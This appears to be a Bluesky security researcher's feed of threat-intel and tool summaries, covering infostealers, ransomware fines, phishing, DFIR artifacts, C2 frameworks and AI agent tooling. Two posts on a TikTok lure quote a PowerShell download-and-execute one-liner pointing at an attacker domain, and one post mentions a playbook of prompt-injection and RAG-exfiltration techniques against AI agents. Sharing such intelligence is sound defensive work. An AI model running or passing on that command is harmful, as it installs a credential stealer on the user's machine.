Hasamba
@hasamba72.bsky.social
https://linktr.ee/yanivr
ARES is a PowerShell AD toolkit for authorized testing: enumerates SPNs, AS-REP accounts, KRBTGT status and GPOs; includes Kerberoast, AS-REP roast and rate-limited password spraying. #tool #kerberos #AD https://bit.ly/4n9f2B3
Doxxing of alleged Lumma Stealer operators and compromised Telegram accounts coincided with a steep fall in sample detections and C2 activity; customers shifted to Vidar and StealC. #lumma_stealer #water_kurita #doxxing https://bit.ly/46Z8SyJ
BlackBasta exfiltrated over 6M records from Capita in Mar 2023; ICO’s Oct 2025 report cites control failures across multiple legal entities and a £14M fine. #BlackBasta #Capita #ransomware https://bit.ly/4os7gTS
Full AI Fundamentals 100 video (3+ hrs) from The Cyber Mentor: Intro to neural networks, NLP, LLMs and self-hosting LLMs. Free labs and a completion certificate are available via TCM Security Academy. #AI #LLMs #TCMSecurity https://bit.ly/3J3MISP
Self-hosted no-code scraper: Scraperr uses XPath extraction, domain spidering and media downloads; backend stores results in MongoDB and exposes APIs via FastAPI. #tool #webscraping https://bit.ly/4qAmPen
DPRK actor UNC5342 stores JavaScript payloads in smart contracts (Ethereum, BNB Smart Chain); loader retrieves via eth_call and delivers JADESNOW / INVISIBLEFERRET, enabling crypto theft and resilient C2. #EtherHiding #UNC5342 #JADESNOW https://bit.ly/4qlCSfY
ExCyTIn-Bench evaluates LLM agents on threat hunting with an interactive MySQL database and generated security Q&A tests; dataset on Hugging Face; evaluations updated with Qwen‑235B and Grok‑4. #tool #LLM #dataset https://bit.ly/4nbwRj0
TikTok lure uses PowerShell iex (irm slmgr.win/photoshop) to fetch a script (SHA256: 6D897B56...) that downloads AuroStealer (updater.exe) and a self‑compiling loader (source.exe). #aurostealer #tiktok #malware https://bit.ly/4o2w7y2
TikTok clips push a PowerShell one-liner that loads a malicious script (SHA256 6d897b...) leading to updater.exe (AuroStealer) and a self-compiling loader using csc.exe. #AuroStealer #PowerShell #TikTok https://bit.ly/4o2w7y2
Microsoft report: 52%+ of attacks with known motives tied to extortion/ransomware; 80% involved data theft; AI is accelerating phishing and malware development; MFA blocks >99% of identity attacks. #ransomware #MFA #AI https://bit.ly/3KTnFSY
Anthropic released Claude Skills: modular Markdown "skills" loaded on-demand via frontmatter YAML. Supports .pdf/.docx/.xlsx/.pptx, can run helper scripts (e.g., GIF builder) and checks like check_slack_size. #claude_skills #tool #anthropic https://bit.ly/3WJ2oOo
YouTube video "stealing passwords" (ID DhP2Hw-6DgY) is listed but metadata and technical indicators are not provided in the input. #password_theft #infosec https://bit.ly/42Jqegz
Netcraft uncovered Basic Auth phishing that embeds gmo-aozora[.]com in the username to spoof GMO Aozora; landing domains coylums[.], blitzfest[.], pavelrehurek[.] share /sKgdiq pages with a Japanese CAPTCHA. #phishing #basic_auth https://bit.ly/4n4m8GX
ClatScope aggregates Perplexity, HaveIBeenPwned, Hunter and RapidAPI for deep IP/domain/email recon; Mini edition requires no API keys; paid subscriptions include pre-provisioned, rotated API keys with usage tracking. #tool #OSINT https://bit.ly/4qeF34y
Pulseway RMM spotted in incidents: supports silent install and remote exec (CMD/PowerShell). Key artifacts: service 'PC Monitor', scheduled task 'PulsewayServiceCheck', registry HKLM\SOFTWARE\MMSOFT Design\PC Monitor. #Pulseway #RMM #DFIR https://bit.ly/4nXB3nQ
Agentic AI Red Teaming Playbook: end-to-end methods for agentic layers, covering prompt injection, RAG data exfiltration, tool-chaining, and exploitation techniques. Practical, battle-tested examples. #redteaming #AI #LLMsecurity https://bit.ly/3WEgBMw
Ducky bundles SSH/Telnet/Serial terminals, SNMP topology mapper, multi-threaded port scanner, subnet calculator and NIST CVE lookup into one PySide6 desktop GUI. #tool #python #snmp https://bit.ly/4n5vgLA
Public websites often hold API keys, DB strings, S3/GCS tokens and staging/admin URLs — the guide shows how these secrets are commonly discovered and why one leak can cascade into larger compromise. #infosec #osint #bugbounty https://bit.ly/4nKD8TT
Preconfigured Windows VM for DFIR investigations with a pinned DFIR_Toolbar and Explorer right-click integrations for artifact and disk-image parsing. Inspired by SIFT Workstation. #DFIR #WindowsForensics #tool https://bit.ly/3J6cZQb
ZeroTier builds a software-defined overlay with peer-to-peer direct connections, end-to-end encryption, and unique cryptographic IDs for device trust — targets IoT, SD‑WAN, and VPN use cases. #tool #zerotier https://bit.ly/3IK9ajP
Wyrm v0.3 Hatchling: Rust post‑exploitation C2 with HTTP(S) agents, custom below‑TLS encryption, dynamic payload staging and anti‑YARA IOCs. #tool #redteam https://bit.ly/4qbgQMz
Windows 11 Recall stores screenshots at %AppData%\Local\CoreAIPlatform...; Exif.Photo.MakerNote contains window title, path and timestamps; uses DiskANN DBs SemanticTextStore.sidb and SemanticImageS for search. #Windows11 #Recall #DFIR https://bit.ly/46NKIak
n8n workflow drives a Telegram AI agent that recognizes meals from photos, returns calorie and macro breakdowns, and logs results to a personal nutrition table. #n8n #Telegram #tool https://bit.ly/4haAUe6
Paper2Video turns a paper+image+audio into a presentation video via PaperTalker; key components: slide generation, subtitling, cursor grounding, speech synthesis, and talking‑head rendering. Released code and a HuggingFace dataset. #paper2video #tool https://bit.ly/4nJteBX
Claude Code now supports plugins bundling slash commands, subagents, MCP servers and hooks; installable via /plugin in public beta and discoverable via marketplaces using a claude-plugin/marketplace.json. #plugins #MCP #tool https://bit.ly/42AIFUG